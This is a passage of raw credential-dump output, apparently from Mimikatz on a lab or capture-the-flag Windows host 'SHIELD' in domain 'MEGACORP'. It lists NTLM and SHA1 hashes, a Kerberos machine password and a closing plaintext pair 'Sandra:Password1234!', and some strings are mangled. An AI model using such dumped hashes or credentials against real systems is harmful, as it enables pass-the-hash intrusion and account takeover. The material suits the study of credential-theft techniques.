:wdigest :* Username : SHIELD$* Domain : MEGACORP* Password : (null)kerberos :* Username : SHIELD$* Domain : MEGACORP.LOCAL* Password : cw)_#JH _gA:]UqNu4XiN`yA'9Z'OuYCxXl]30fY1PaK,AL#ndtjq?]h_8<Kx'\*9e<s`ZV uNjoe Q%\_mX<Eo%lB:[email protected]+qJt_l887Ew&m_ewr??#VE&ssp :credman :Authentication Id : 0 ; 65691 (00000000:0001009b)Session : Interactive from 1User Name : DWM-1Domain : Window ManagerLogon Server : (null)Logon Time : 5/4/2020 10:19:01 PMSID : S-1-5-90-0-1msv :[00000003] Primary* Username : SHIELD$* Domain : MEGACORP* NTLM : 9d4feee71a4f411bf92a86b523d64437* SHA1 : 0ee4dc73f1c40da71a60894eff504cc732de82datspkg :wdigest :* Username : SHIELD$* Domain : MEGACORP* Password : (null)kerberos :* Username : SHIELD$* Domain : MEGACORP.LOCAL* Password : cw)_#JH _gA:]UqNu4XiN`yA'9Z'OuYCxXl]30fY1PaK,AL#ndtjq?]h_8<Kx'\*9e<s`ZV uNjoe Q%\_mX<Eo%lB:[email protected]+qJt_l887Ew&m_ewr??#VE&ssp :credman :Authentication Id : 0 ; 36390 (00000000:00008e26)Session : UndefinedLogonType from 0User Name : (null)Domain : (null)Logon Server : (null)Logon Time : 5/4/2020 10:19:00 PMSID :msv :[00000003] Primary* Username : SHIELD$* Domain : MEGACORP* NTLM : 9d4feee71a4f411bf92a86b523d64437* SHA1 : 0ee4dc73f1c40da71a60894eff504cc732de82datspkg :wdigest :kerberos :ssp :credman :Authentication Id : 0 ; 999 (00000000:000003e7)Session : UndefinedLogonType from 0User Name : SHIELD$Domain : MEGACORPLogon Server : (null)Logon Time : 5/4/2020 10:19:00 PMSID : S-1-5-18msv :tspkg :wdigest :* Username : SHIELD$* Domain : MEGACORP* Password : (null)kerberos :* Username : shield$* Domain : MEGACORP.LOCAL* Password : cw)_#JH _gA:]UqNu4XiN`yA'9Z'OuYCxXl]30fY1PaK,AL#ndtjq?]h_8<Kx'\*9e<s`ZV uNjoe Q%\_mX<Eo%lB:[email protected]+qJt_l887Ew&m_ewr??#VE&ssp :credman :Result: Credentials
Sandra:Password1234!
.